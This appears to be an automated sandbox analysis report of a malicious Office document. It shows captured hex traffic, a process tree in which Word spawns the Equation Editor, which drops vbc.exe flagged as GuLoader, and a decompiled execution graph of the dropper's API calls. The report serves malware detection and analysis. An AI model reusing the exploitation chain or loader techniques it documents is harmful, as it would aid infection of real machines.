                                              Jan 27, 2022 10:45:44.261888981 CET12INData Raw: 00 00 00 85 c0 74 2f 56 57 ff 75 0c e8 47 2c 00 00 85 c0 74 c8 01 75 fc 29 75 14 83 7d 14 00 7f cc eb 1b 39 75 14 7d 03 8b 75 14 56 57 e8 16 00 00 00 85 c0 75 05 6a fd 58 eb 06 89 75 fc 8b 45 fc 5f 5e 5b c9 c2 10 00 ff 74 24 08 ff 74 24 08 ff 35
                                              Data Ascii: t/VWuG,tu)u}9u}uVWujXuE_^[t$t$5@+jjt$5@`@V(DV2Vu)u^V(V%Vh D1+^USVWj _3h]E@]@5@P]]
                                              Jan 27, 2022 10:45:44.261904001 CET14INData Raw: 78 2b 00 00 0f b7 05 5a a2 40 00 0f b7 0d 58 a2 40 00 c1 e0 10 0b c1 c7 45 f8 1a 00 00 00 a3 00 68 43 00 bf 28 aa 42 00 a1 10 4f 43 00 ff b0 20 01 00 00 57 e8 80 2b 00 00 57 ff 15 70 81 40 00 39 5d fc 74 3e 6a 01 57 68 00 38 44 00 ff 15 e4 80 40
                                              Data Ascii: x+Z@X@EhC(BOC W+Wp@9]t>jWh8D@t,SW(OC$WJ+W ;tP$@]fhCMuSV(3@9]th u'!j@9OCtvEPj(@P$@t/EPh0@S @SSESP
                                              Jan 27, 2022 10:45:44.375817060 CET15INData Raw: 29 66 33 e8 23 eb 66 85 ed 74 06 85 f6 75 ec eb 19 8b 51 02 89 15 e0 3e 43 00 8b 51 06 89 15 a8 4f 43 00 8d 51 0a 85 d2 75 12 66 81 fb ff ff 75 07 bb ff 03 00 00 eb a3 33 db eb 9f 89 15 dc 3e 43 00 0f b7 01 50 57 e8 3d 25 00 00 e8 2f 00 00 00 a1
                                              Data Ascii: )f3#ftuQ>CQOCQufu3>CPW=%/,OC5(OCttPFP&Ou_^][V?CjV%V5HBD@^SUVt$$;WaU|$$3GujUUUUW5HB@\$,uBH


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:10:45:18
                                              Start date:27/01/2022
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                              Imagebase:0x13f450000
                                              File size:1423704 bytes
                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:2
                                              Start time:10:45:20
                                              Start date:27/01/2022
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:4
                                              Start time:10:45:22
                                              Start date:27/01/2022
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\Public\vbc.exe"
                                              Imagebase:0x400000
                                              File size:96040 bytes
                                              MD5 hash:6EA8ECF670ED24734A3BE72B69BC5FD9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.680305218.00000000036F0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:6.6%
                                                Dynamic/Decrypted Code Coverage:13.5%
                                                Signature Coverage:23.8%
                                                Total number of Nodes:1014
                                                Total number of Limit Nodes:30
                                                execution_graph 7010 401941 7011 401943 7010->7011 7016 402da6 7011->7016 7017 402db2 7016->7017 7062 40657a 7017->7062 7020 401948 7022 405c49 7020->7022 7104 405f14 7022->7104 7025 405c71 DeleteFileW 7027 401951 7025->7027 7026 405c88 7028 405db3 7026->7028 7118 40653d lstrcpynW 7026->7118 7028->7027 7147 406873 FindFirstFileW 7028->7147 7030 405cae 7031 405cc1 7030->7031 7032 405cb4 lstrcatW 7030->7032 7119 405e58 lstrlenW 7031->7119 7034 405cc7 7032->7034 7036 405cd7 lstrcatW 7034->7036 7037 405ccd 7034->7037 7039 405ce2 lstrlenW FindFirstFileW 7036->7039 7037->7036 7037->7039 7043 405da8 7039->7043 7060 405d04 7039->7060 7040 405dd1 7150 405e0c lstrlenW CharPrevW 7040->7150 7043->7028 7044 405d8b FindNextFileW 7048 405da1 FindClose 7044->7048 7044->7060 7045 405c01 5 API calls 7047 405de3 7045->7047 7049 405de7 7047->7049 7050 405dfd 7047->7050 7048->7043 7049->7027 7053 40559f 24 API calls 7049->7053 7051 40559f 24 API calls 7050->7051 7051->7027 7055 405df4 7053->7055 7054 405c49 60 API calls 7054->7060 7057 4062fd 36 API calls 7055->7057 7056 40559f 24 API calls 7056->7044 7059 405dfb 7057->7059 7059->7027 7060->7044 7060->7054 7060->7056 7123 40653d lstrcpynW 7060->7123 7124 405c01 7060->7124 7132 40559f 7060->7132 7143 4062fd MoveFileExW 7060->7143 7066 406587 7062->7066 7063 4067aa 7064 402dd3 7063->7064 7095 40653d lstrcpynW 7063->7095 7064->7020 7079 4067c4 7064->7079 7066->7063 7067 406778 lstrlenW 7066->7067 7068 40657a 10 API calls 7066->7068 7069 40668f GetSystemDirectoryW 7066->7069 7073 4066a2 GetWindowsDirectoryW 7066->7073 7074 406719 lstrcatW 7066->7074 7075 40657a 10 API calls 7066->7075 7076 4067c4 5 API calls 7066->7076 7077 4066d1 SHGetSpecialFolderLocation 7066->7077 7088 40640b 7066->7088 7093 406484 wsprintfW 7066->7093 7094 40653d lstrcpynW 7066->7094 7067->7066 7068->7067 7069->7066 7073->7066 7074->7066 7075->7066 7076->7066 7077->7066 7078 4066e9 SHGetPathFromIDListW CoTaskMemFree 7077->7078 7078->7066 7085 4067d1 7079->7085 7080 406847 7081 40684c CharPrevW 7080->7081 7084 40686d 7080->7084 7081->7080 7082 40683a CharNextW 7082->7080 7082->7085 7084->7020 7085->7080 7085->7082 7086 406826 CharNextW 7085->7086 7087 406835 CharNextW 7085->7087 7100 405e39 7085->7100 7086->7085 7087->7082 7096 4063aa 7088->7096 7091 40643f RegQueryValueExW RegCloseKey 7092 40646f 7091->7092 7092->7066 7093->7066 7094->7066 7095->7064 7097 4063b9 7096->7097 7098 4063c2 RegOpenKeyExW 7097->7098 7099 4063bd 7097->7099 7098->7099 7099->7091 7099->7092 7101 405e3f 7100->7101 7102 405e55 7101->7102 7103 405e46 CharNextW 7101->7103 7102->7085 7103->7101 7153 40653d lstrcpynW 7104->7153 7106 405f25 7154 405eb7 CharNextW CharNextW 7106->7154 7109 405c69 7109->7025 7109->7026 7110 4067c4 5 API calls 7115 405f3b 7110->7115 7111 405f6c lstrlenW 7112 405f77 7111->7112 7111->7115 7113 405e0c 3 API calls 7112->7113 7116 405f7c GetFileAttributesW 7113->7116 7114 406873 2 API calls 7114->7115 7115->7109 7115->7111 7115->7114 7117 405e58 2 API calls 7115->7117 7116->7109 7117->7111 7118->7030 7120 405e66 7119->7120 7121 405e78 7120->7121 7122 405e6c CharPrevW 7120->7122 7121->7034 7122->7120 7122->7121 7123->7060 7160 406008 GetFileAttributesW 7124->7160 7127 405c24 DeleteFileW 7130 405c2a 7127->7130 7128 405c1c RemoveDirectoryW 7128->7130 7129 405c2e 7129->7060 7130->7129 7131 405c3a SetFileAttributesW 7130->7131 7131->7129 7134 4055ba 7132->7134 7142 40565c 7132->7142 7133 4055d6 lstrlenW 7136 4055e4 lstrlenW 7133->7136 7137 4055ff 7133->7137 7134->7133 7135 40657a 17 API calls 7134->7135 7135->7133 7140 4055f6 lstrcatW 7136->7140 7136->7142 7138 405612 7137->7138 7139 405605 SetWindowTextW 7137->7139 7141 405618 SendMessageW SendMessageW SendMessageW 7138->7141 7138->7142 7139->7138 7140->7137 7141->7142 7142->7060 7144 40631e 7143->7144 7145 406311 7143->7145 7144->7060 7163 406183 7145->7163 7148 405dcd 7147->7148 7149 406889 FindClose 7147->7149 7148->7027 7148->7040 7149->7148 7151 405dd7 7150->7151 7152 405e28 lstrcatW 7150->7152 7151->7045 7152->7151 7153->7106 7155 405ed4 7154->7155 7158 405ee6 7154->7158 7157 405ee1 CharNextW 7155->7157 7155->7158 7156 405f0a 7156->7109 7156->7110 7157->7156 7158->7156 7159 405e39 CharNextW 7158->7159 7159->7158 7161 405c0d 7160->7161 7162 40601a SetFileAttributesW 7160->7162 7161->7127 7161->7128 7161->7129 7162->7161 7164 4061b3 7163->7164 7165 4061d9 GetShortPathNameW 7163->7165 7190 40602d GetFileAttributesW CreateFileW 7164->7190 7167 4062f8 7165->7167 7168 4061ee 7165->7168 7167->7144 7168->7167 7170 4061f6 wsprintfA 7168->7170 7169 4061bd CloseHandle GetShortPathNameW 7169->7167 7171 4061d1 7169->7171 7172 40657a 17 API calls 7170->7172 7171->7165 7171->7167 7173 40621e 7172->7173 7191 40602d GetFileAttributesW CreateFileW 7173->7191 7175 40622b 7175->7167 7176 40623a GetFileSize GlobalAlloc 7175->7176 7177 4062f1 CloseHandle 7176->7177 7178 40625c 7176->7178 7177->7167 7192 4060b0 ReadFile 7178->7192 7183 40627b lstrcpyA 7186 40629d 7183->7186 7184 40628f 7185 405f92 4 API calls 7184->7185 7185->7186 7187 4062d4 SetFilePointer 7186->7187 7199 4060df WriteFile 7187->7199 7190->7169 7191->7175 7193 4060ce 7192->7193 7193->7177 7194 405f92 lstrlenA 7193->7194 7195 405fd3 lstrlenA 7194->7195 7196 405fdb 7195->7196 7197 405fac lstrcmpiA 7195->7197 7196->7183 7196->7184 7197->7196 7198 405fca CharNextA 7197->7198 7198->7195 7200 4060fd GlobalFree 7199->7200 7200->7177 8928 402b59 8929 402b60 8928->8929 8930 402bab 8928->8930 8933 402d84 17 API calls 8929->8933 8934 402ba9 8929->8934 8931 40690a 5 API calls 8930->8931 8932 402bb2 8931->8932 8935 402da6 17 API calls 8932->8935 8936 402b6e 8933->8936 8937 402bbb 8935->8937 8938 402d84 17 API calls 8936->8938 8937->8934 8939 402bbf IIDFromString 8937->8939 8941 402b7a 8938->8941 8939->8934 8940 402bce 8939->8940 8940->8934 8946 40653d lstrcpynW 8940->8946 8945 406484 wsprintfW 8941->8945 8943 402beb CoTaskMemFree 8943->8934 8945->8934 8946->8943 7867 40175c 7868 402da6 17 API calls 7867->7868 7869 401763 7868->7869 7870 40605c 2 API calls 7869->7870 7871 40176a 7870->7871 7872 40605c 2 API calls 7871->7872 7872->7871 7004 36f834f 7006 36f8354 7004->7006 7007 36f8388 7006->7007 7007->7007 7008 36f8399 RtlAddVectoredExceptionHandler 7007->7008 7009 36f83af 7008->7009 7009->7009 8951 401563 8952 402ba4 8951->8952 8955 406484 wsprintfW 8952->8955 8954 402ba9 8955->8954 8956 401968 8957 402d84 17 API calls 8956->8957 8958 40196f 8957->8958 8959 402d84 17 API calls 8958->8959 8960 40197c 8959->8960 8961 402da6 17 API calls 8960->8961 8962 401993 lstrlenW 8961->8962 8964 4019a4 8962->8964 8963 4019e5 8964->8963 8968 40653d lstrcpynW 8964->8968 8966 4019d5 8966->8963 8967 4019da lstrlenW 8966->8967 8967->8963 8968->8966 7533 40176f 7534 402da6 17 API calls 7533->7534 7535 401776 7534->7535 7536 401796 7535->7536 7537 40179e 7535->7537 7572 40653d lstrcpynW 7536->7572 7573 40653d lstrcpynW 7537->7573 7540 40179c 7544 4067c4 5 API calls 7540->7544 7541 4017a9 7542 405e0c 3 API calls 7541->7542 7543 4017af lstrcatW 7542->7543 7543->7540 7562 4017bb 7544->7562 7545 406873 2 API calls 7545->7562 7546 406008 2 API calls 7546->7562 7548 4017cd CompareFileTime 7548->7562 7549 40188d 7551 40559f 24 API calls 7549->7551 7550 401864 7552 40559f 24 API calls 7550->7552 7560 401879 7550->7560 7554 401897 7551->7554 7552->7560 7553 40653d lstrcpynW 7553->7562 7555 4032b4 31 API calls 7554->7555 7556 4018aa 7555->7556 7557 4018be SetFileTime 7556->7557 7558 4018d0 CloseHandle 7556->7558 7557->7558 7558->7560 7561 4018e1 7558->7561 7559 40657a 17 API calls 7559->7562 7563 4018e6 7561->7563 7564 4018f9 7561->7564 7562->7545 7562->7546 7562->7548 7562->7549 7562->7550 7562->7553 7562->7559 7567 405b9d MessageBoxIndirectW 7562->7567 7571 40602d GetFileAttributesW CreateFileW 7562->7571 7565 40657a 17 API calls 7563->7565 7566 40657a 17 API calls 7564->7566 7568 4018ee lstrcatW 7565->7568 7569 401901 7566->7569 7567->7562 7568->7569 7569->7560 7570 405b9d MessageBoxIndirectW 7569->7570 7570->7560 7571->7562 7572->7540 7573->7541 9080 40190c 9081 401943 9080->9081 9082 402da6 17 API calls 9081->9082 9083 401948 9082->9083 9084 405c49 67 API calls 9083->9084 9085 401951 9084->9085 7574 73282a7f 7575 73282acf 7574->7575 7576 73282a8f VirtualProtect 7574->7576 7576->7575 8381 40261c 8382 402da6 17 API calls 8381->8382 8383 402623 8382->8383 8386 40602d GetFileAttributesW CreateFileW 8383->8386 8385 40262f 8386->8385 9182 40252a 9183 402de6 17 API calls 9182->9183 9184 402534 9183->9184 9185 402da6 17 API calls 9184->9185 9186 40253d 9185->9186 9187 402548 RegQueryValueExW 9186->9187 9190 40292e 9186->9190 9188 40256e RegCloseKey 9187->9188 9189 402568 9187->9189 9188->9190 9189->9188 9193 406484 wsprintfW 9189->9193 9193->9188 7244 40352d SetErrorMode GetVersionExW 7245 4035b7 7244->7245 7246 40357f GetVersionExW 7244->7246 7247 403610 7245->7247 7248 40690a 5 API calls 7245->7248 7246->7245 7249 40689a 3 API calls 7247->7249 7248->7247 7250 403626 lstrlenA 7249->7250 7250->7247 7251 403636 7250->7251 7252 40690a 5 API calls 7251->7252 7253 40363d 7252->7253 7254 40690a 5 API calls 7253->7254 7255 403644 7254->7255 7256 40690a 5 API calls 7255->7256 7257 403650 #17 OleInitialize SHGetFileInfoW 7256->7257 7335 40653d lstrcpynW 7257->7335 7260 40369d GetCommandLineW 7336 40653d lstrcpynW 7260->7336 7262 4036af 7263 405e39 CharNextW 7262->7263 7264 4036d5 CharNextW 7263->7264 7275 4036e6 7264->7275 7265 4037e4 7266 4037f8 GetTempPathW 7265->7266 7337 4034fc 7266->7337 7268 403810 7269 403814 GetWindowsDirectoryW lstrcatW 7268->7269 7270 40386a DeleteFileW 7268->7270 7272 4034fc 12 API calls 7269->7272 7347 40307d GetTickCount GetModuleFileNameW 7270->7347 7271 405e39 CharNextW 7271->7275 7276 403830 7272->7276 7274 40387d 7277 403941 7274->7277 7280 403932 7274->7280 7284 405e39 CharNextW 7274->7284 7275->7265 7275->7271 7279 4037e6 7275->7279 7276->7270 7278 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 7276->7278 7439 403b12 7277->7439 7283 4034fc 12 API calls 7278->7283 7431 40653d lstrcpynW 7279->7431 7375 403bec 7280->7375 7287 403862 7283->7287 7300 40389f 7284->7300 7287->7270 7287->7277 7288 403a69 7446 405b9d 7288->7446 7289 403a7e 7291 403a86 GetCurrentProcess OpenProcessToken 7289->7291 7292 403afc ExitProcess 7289->7292 7297 403acc 7291->7297 7298 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 7291->7298 7294 403908 7302 405f14 18 API calls 7294->7302 7295 403949 7301 405b08 5 API calls 7295->7301 7299 40690a 5 API calls 7297->7299 7298->7297 7303 403ad3 7299->7303 7300->7294 7300->7295 7304 40394e lstrcatW 7301->7304 7305 403914 7302->7305 7306 403ae8 ExitWindowsEx 7303->7306 7309 403af5 7303->7309 7307 40396a lstrcatW lstrcmpiW 7304->7307 7308 40395f lstrcatW 7304->7308 7305->7277 7432 40653d lstrcpynW 7305->7432 7306->7292 7306->7309 7307->7277 7310 40398a 7307->7310 7308->7307 7450 40140b 7309->7450 7314 403996 7310->7314 7315 40398f 7310->7315 7312 403927 7433 40653d lstrcpynW 7312->7433 7316 405aeb 2 API calls 7314->7316 7318 405a6e 4 API calls 7315->7318 7319 40399b SetCurrentDirectoryW 7316->7319 7320 403994 7318->7320 7321 4039b8 7319->7321 7322 4039ad 7319->7322 7320->7319 7435 40653d lstrcpynW 7321->7435 7434 40653d lstrcpynW 7322->7434 7325 40657a 17 API calls 7326 4039fa DeleteFileW 7325->7326 7327 403a06 CopyFileW 7326->7327 7332 4039c5 7326->7332 7327->7332 7328 403a50 7329 4062fd 36 API calls 7328->7329 7329->7277 7330 4062fd 36 API calls 7330->7332 7331 40657a 17 API calls 7331->7332 7332->7325 7332->7328 7332->7330 7332->7331 7334 403a3a CloseHandle 7332->7334 7436 405b20 CreateProcessW 7332->7436 7334->7332 7335->7260 7336->7262 7338 4067c4 5 API calls 7337->7338 7340 403508 7338->7340 7339 403512 7339->7268 7340->7339 7341 405e0c 3 API calls 7340->7341 7342 40351a 7341->7342 7343 405aeb 2 API calls 7342->7343 7344 403520 7343->7344 7453 40605c 7344->7453 7457 40602d GetFileAttributesW CreateFileW 7347->7457 7349 4030bd 7369 4030cd 7349->7369 7458 40653d lstrcpynW 7349->7458 7351 4030e3 7352 405e58 2 API calls 7351->7352 7353 4030e9 7352->7353 7459 40653d lstrcpynW 7353->7459 7355 4030f4 GetFileSize 7356 4031ee 7355->7356 7374 40310b 7355->7374 7460 403019 7356->7460 7358 4031f7 7360 403227 GlobalAlloc 7358->7360 7358->7369 7495 4034e5 SetFilePointer 7358->7495 7471 4034e5 SetFilePointer 7360->7471 7361 40325a 7365 403019 6 API calls 7361->7365 7364 403242 7472 4032b4 7364->7472 7365->7369 7366 403210 7367 4034cf ReadFile 7366->7367 7371 40321b 7367->7371 7369->7274 7370 403019 6 API calls 7370->7374 7371->7360 7371->7369 7372 40324e 7372->7369 7372->7372 7373 40328b SetFilePointer 7372->7373 7373->7369 7374->7356 7374->7361 7374->7369 7374->7370 7492 4034cf 7374->7492 7376 40690a 5 API calls 7375->7376 7377 403c00 7376->7377 7378 403c06 7377->7378 7379 403c18 7377->7379 7516 406484 wsprintfW 7378->7516 7380 40640b 3 API calls 7379->7380 7381 403c48 7380->7381 7383 403c67 lstrcatW 7381->7383 7385 40640b 3 API calls 7381->7385 7384 403c16 7383->7384 7501 403ec2 7384->7501 7385->7383 7388 405f14 18 API calls 7389 403c99 7388->7389 7390 403d2d 7389->7390 7392 40640b 3 API calls 7389->7392 7391 405f14 18 API calls 7390->7391 7393 403d33 7391->7393 7394 403ccb 7392->7394 7395 403d43 LoadImageW 7393->7395 7396 40657a 17 API calls 7393->7396 7394->7390 7399 403cec lstrlenW 7394->7399 7402 405e39 CharNextW 7394->7402 7397 403de9 7395->7397 7398 403d6a RegisterClassW 7395->7398 7396->7395 7401 40140b 2 API calls 7397->7401 7400 403da0 SystemParametersInfoW CreateWindowExW 7398->7400 7430 403df3 7398->7430 7403 403d20 7399->7403 7404 403cfa lstrcmpiW 7399->7404 7400->7397 7405 403def 7401->7405 7406 403ce9 7402->7406 7408 405e0c 3 API calls 7403->7408 7404->7403 7407 403d0a GetFileAttributesW 7404->7407 7411 403ec2 18 API calls 7405->7411 7405->7430 7406->7399 7410 403d16 7407->7410 7409 403d26 7408->7409 7517 40653d lstrcpynW 7409->7517 7410->7403 7414 405e58 2 API calls 7410->7414 7412 403e00 7411->7412 7415 403e0c ShowWindow 7412->7415 7416 403e8f 7412->7416 7414->7403 7417 40689a 3 API calls 7415->7417 7509 405672 OleInitialize 7416->7509 7419 403e24 7417->7419 7423 403e32 GetClassInfoW 7419->7423 7425 40689a 3 API calls 7419->7425 7420 403e95 7421 403eb1 7420->7421 7422 403e99 7420->7422 7424 40140b 2 API calls 7421->7424 7428 40140b 2 API calls 7422->7428 7422->7430 7426 403e46 GetClassInfoW RegisterClassW 7423->7426 7427 403e5c DialogBoxParamW 7423->7427 7424->7430 7425->7423 7426->7427 7429 40140b 2 API calls 7427->7429 7428->7430 7429->7430 7430->7277 7431->7266 7432->7312 7433->7280 7434->7321 7435->7332 7437 405b53 CloseHandle 7436->7437 7438 405b5f 7436->7438 7437->7438 7438->7332 7440 403b2a 7439->7440 7441 403b1c CloseHandle 7439->7441 7529 403b57 7440->7529 7441->7440 7444 405c49 67 API calls 7445 403a5e OleUninitialize 7444->7445 7445->7288 7445->7289 7447 405bb2 7446->7447 7448 403a76 ExitProcess 7447->7448 7449 405bc6 MessageBoxIndirectW 7447->7449 7449->7448 7451 401389 2 API calls 7450->7451 7452 401420 7451->7452 7452->7292 7454 406069 GetTickCount GetTempFileNameW 7453->7454 7455 40352b 7454->7455 7456 40609f 7454->7456 7455->7268 7456->7454 7456->7455 7457->7349 7458->7351 7459->7355 7461 403022 7460->7461 7462 40303a 7460->7462 7463 403032 7461->7463 7464 40302b DestroyWindow 7461->7464 7465 403042 7462->7465 7466 40304a GetTickCount 7462->7466 7463->7358 7464->7463 7496 406946 7465->7496 7468 403058 CreateDialogParamW ShowWindow 7466->7468 7469 40307b 7466->7469 7468->7469 7469->7358 7471->7364 7473 4032cd 7472->7473 7474 4032fb 7473->7474 7500 4034e5 SetFilePointer 7473->7500 7476 4034cf ReadFile 7474->7476 7477 403306 7476->7477 7478 403468 7477->7478 7479 403318 GetTickCount 7477->7479 7484 403452 7477->7484 7480 4034aa 7478->7480 7481 40346c 7478->7481 7479->7484 7489 403367 7479->7489 7483 4034cf ReadFile 7480->7483 7481->7484 7485 4034cf ReadFile 7481->7485 7486 4060df WriteFile 7481->7486 7482 4034cf ReadFile 7482->7489 7483->7484 7484->7372 7485->7481 7486->7481 7487 4033bd GetTickCount 7487->7489 7488 4033e2 MulDiv wsprintfW 7490 40559f 24 API calls 7488->7490 7489->7482 7489->7484 7489->7487 7489->7488 7491 4060df WriteFile 7489->7491 7490->7489 7491->7489 7493 4060b0 ReadFile 7492->7493 7494 4034e2 7493->7494 7494->7374 7495->7366 7497 406963 PeekMessageW 7496->7497 7498 403048 7497->7498 7499 406959 DispatchMessageW 7497->7499 7498->7358 7499->7497 7500->7474 7502 403ed6 7501->7502 7518 406484 wsprintfW 7502->7518 7504 403f47 7519 403f7b 7504->7519 7506 403c77 7506->7388 7507 403f4c 7507->7506 7508 40657a 17 API calls 7507->7508 7508->7507 7522 4044e5 7509->7522 7511 4044e5 SendMessageW 7512 4056ce OleUninitialize 7511->7512 7512->7420 7513 405695 7515 4056bc 7513->7515 7525 401389 7513->7525 7515->7511 7516->7384 7517->7390 7518->7504 7520 40657a 17 API calls 7519->7520 7521 403f89 SetWindowTextW 7520->7521 7521->7507 7523 4044fd 7522->7523 7524 4044ee SendMessageW 7522->7524 7523->7513 7524->7523 7527 401390 7525->7527 7526 4013fe 7526->7513 7527->7526 7528 4013cb MulDiv SendMessageW 7527->7528 7528->7527 7531 403b65 7529->7531 7530 403b2f 7530->7444 7531->7530 7532 403b6a FreeLibrary GlobalFree 7531->7532 7532->7530 7532->7532 8536 40263e 8537 402652 8536->8537 8538 40266d 8536->8538 8539 402d84 17 API calls 8537->8539 8540 402672 8538->8540 8541 40269d 8538->8541 8549 402659 8539->8549 8543 402da6 17 API calls 8540->8543 8542 402da6 17 API calls 8541->8542 8544 4026a4 lstrlenW 8542->8544 8545 402679 8543->8545 8544->8549 8553 40655f WideCharToMultiByte 8545->8553 8547 40268d lstrlenA 8547->8549 8548 4026e7 8549->8548 8552 4026d1 8549->8552 8554 40610e SetFilePointer 8549->8554 8550 4060df WriteFile 8550->8548 8552->8548 8552->8550 8553->8547 8555 40612a 8554->8555 8562 406142 8554->8562 8556 4060b0 ReadFile 8555->8556 8557 406136 8556->8557 8558 406173 SetFilePointer 8557->8558 8559 40614b SetFilePointer 8557->8559 8557->8562 8558->8562 8559->8558 8560 406156 8559->8560 8561 4060df WriteFile 8560->8561 8561->8562 8562->8552 7201 4015c1 7202 402da6 17 API calls 7201->7202 7203 4015c8 7202->7203 7204 405eb7 4 API calls 7203->7204 7217 4015d1 7204->7217 7205 401631 7207 401663 7205->7207 7208 401636 7205->7208 7206 405e39 CharNextW 7206->7217 7210 401423 24 API calls 7207->7210 7228 401423 7208->7228 7216 40165b 7210->7216 7214 40164a SetCurrentDirectoryW 7214->7216 7217->7205 7217->7206 7218 401617 GetFileAttributesW 7217->7218 7220 405b08 7217->7220 7223 405a6e CreateDirectoryW 7217->7223 7232 405aeb CreateDirectoryW 7217->7232 7218->7217 7235 40690a GetModuleHandleA 7220->7235 7224 405abf GetLastError 7223->7224 7225 405abb 7223->7225 7224->7225 7226 405ace SetFileSecurityW 7224->7226 7225->7217 7226->7225 7227 405ae4 GetLastError 7226->7227 7227->7225 7229 40559f 24 API calls 7228->7229 7230 401431 7229->7230 7231 40653d lstrcpynW 7230->7231 7231->7214 7233 405afb 7232->7233 7234 405aff GetLastError 7232->7234 7233->7217 7234->7233 7236 406930 GetProcAddress 7235->7236 7237 406926 7235->7237 7239 405b0f 7236->7239 7241 40689a GetSystemDirectoryW 7237->7241 7239->7217 7240 40692c 7240->7236 7240->7239 7242 4068bc wsprintfW LoadLibraryExW 7241->7242 7242->7240 8625 4016cc 8626 402da6 17 API calls 8625->8626 8627 4016d2 GetFullPathNameW 8626->8627 8628 4016ec 8627->8628 8634 40170e 8627->8634 8631 406873 2 API calls 8628->8631 8628->8634 8629 401723 GetShortPathNameW 8630 402c2a 8629->8630 8632 4016fe 8631->8632 8632->8634 8635 40653d lstrcpynW 8632->8635 8634->8629 8634->8630 8635->8634 7577 4020d8 7578 4020ea 7577->7578 7588 40219c 7577->7588 7579 402da6 17 API calls 7578->7579 7581 4020f1 7579->7581 7580 401423 24 API calls 7582 4022f6 7580->7582 7583 402da6 17 API calls 7581->7583 7584 4020fa 7583->7584 7585 402110 LoadLibraryExW 7584->7585 7586 402102 GetModuleHandleW 7584->7586 7587 402121 7585->7587 7585->7588 7586->7585 7586->7587 7600 406979 7587->7600 7588->7580 7591 402132 7593 402151 7591->7593 7594 40213a 7591->7594 7592 40216b 7595 40559f 24 API calls 7592->7595 7605 73281817 7593->7605 7597 401423 24 API calls 7594->7597 7596 402142 7595->7596 7596->7582 7598 40218e FreeLibrary 7596->7598 7597->7596 7598->7582 7647 40655f WideCharToMultiByte 7600->7647 7602 406996 7603 40699d GetProcAddress 7602->7603 7604 40212c 7602->7604 7603->7604 7604->7591 7604->7592 7606 7328184a 7605->7606 7648 73281bff 7606->7648 7608 73281851 7609 73281976 7608->7609 7610 73281869 7608->7610 7611 73281862 7608->7611 7609->7596 7682 73282480 7610->7682 7698 7328243e 7611->7698 7616 732818cd 7621 7328191e 7616->7621 7622 732818d3 7616->7622 7617 732818af 7711 73282655 7617->7711 7618 73281898 7630 7328188e 7618->7630 7708 73282e23 7618->7708 7619 7328187f 7626 73281890 7619->7626 7627 73281885 7619->7627 7624 73282655 10 API calls 7621->7624 7730 73281666 7622->7730 7631 7328190f 7624->7631 7625 732818b5 7722 73281654 7625->7722 7702 73282810 7626->7702 7627->7630 7692 73282b98 7627->7692 7630->7616 7630->7617 7638 73281965 7631->7638 7736 73282618 7631->7736 7635 73282655 10 API calls 7635->7631 7637 73281896 7637->7630 7638->7609 7640 7328196f GlobalFree 7638->7640 7640->7609 7644 73281951 7644->7638 7740 732815dd wsprintfW 7644->7740 7645 7328194a FreeLibrary 7645->7644 7647->7602 7743 732812bb GlobalAlloc 7648->7743 7650 73281c26 7744 732812bb GlobalAlloc 7650->7744 7652 73281e6b GlobalFree GlobalFree GlobalFree 7653 73281e88 7652->7653 7667 73281ed2 7652->7667 7656 7328227e 7653->7656 7665 73281e9d 7653->7665 7653->7667 7654 73281c31 7654->7652 7655 73281d26 GlobalAlloc 7654->7655 7657 732821ae 7654->7657 7661 73281d71 lstrcpyW 7654->7661 7662 73281d8f GlobalFree 7654->7662 7664 73281d7b lstrcpyW 7654->7664 7666 73282126 7654->7666 7654->7667 7673 73282067 GlobalFree 7654->7673 7674 73281dcd 7654->7674 7676 732812cc 2 API calls 7654->7676 7655->7654 7658 732822a0 GetModuleHandleW 7656->7658 7656->7667 7657->7667 7679 73282216 lstrcpyW 7657->7679 7659 732822b1 LoadLibraryW 7658->7659 7660 732822c6 7658->7660 7659->7660 7659->7667 7751 732816bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 7660->7751 7661->7664 7662->7654 7664->7654 7665->7667 7747 732812cc 7665->7747 7750 732812bb GlobalAlloc 7666->7750 7667->7608 7670 73282318 7670->7667 7671 73282325 lstrlenW 7670->7671 7752 732816bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 7671->7752 7673->7654 7674->7654 7745 7328162f GlobalSize GlobalAlloc 7674->7745 7675 7328233f 7675->7667 7676->7654 7677 732822d8 7677->7670 7680 73282302 GetProcAddress 7677->7680 7679->7667 7680->7670 7681 7328212f 7681->7608 7689 73282498 7682->7689 7683 732812cc GlobalAlloc lstrcpynW 7683->7689 7685 732825c1 GlobalFree 7688 7328186f 7685->7688 7685->7689 7686 7328256b GlobalAlloc CLSIDFromString 7686->7685 7687 73282540 GlobalAlloc WideCharToMultiByte 7687->7685 7688->7618 7688->7619 7688->7630 7689->7683 7689->7685 7689->7686 7689->7687 7691 7328258a 7689->7691 7754 7328135a 7689->7754 7691->7685 7758 732827a4 7691->7758 7694 73282baa 7692->7694 7693 73282c4f CloseHandle 7697 73282c6d 7693->7697 7694->7693 7696 73282d39 7696->7630 7761 73282b42 7697->7761 7699 73282453 